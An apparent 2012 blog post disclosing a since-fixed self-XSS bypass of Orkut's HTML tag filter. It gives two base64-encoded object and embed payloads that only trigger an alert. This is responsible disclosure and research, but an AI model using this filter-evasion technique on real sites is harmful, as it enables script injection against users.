Thursday, December 6, 2012

Google Orkut HTML limitations bypass


When playing around on my personal Orkut.com account I just figured how to bypass the "Unsupported html tags were removed from the html source." present in many places like: Profile - About [name] or posting on Updates. This issue could lead to a self XSS.

The trick is to use object or embed tag on the html tab.

<object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk7PC9zY3JpcHQ+'></object>

<EMBED SRC='data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoInhzcyIpOzwvc2NyaXB0Pjwvc3ZnPg==' type='image/svg+xml' AllowScriptAccess='always'></EMBED>

When you hit save or click again on the html button, it will execute the code.


The code is not saved, so it's not persistent.

This issue has already been fixed by Google Security Team and put me on the Honorable Mention on Google Vulnerability Reward Program.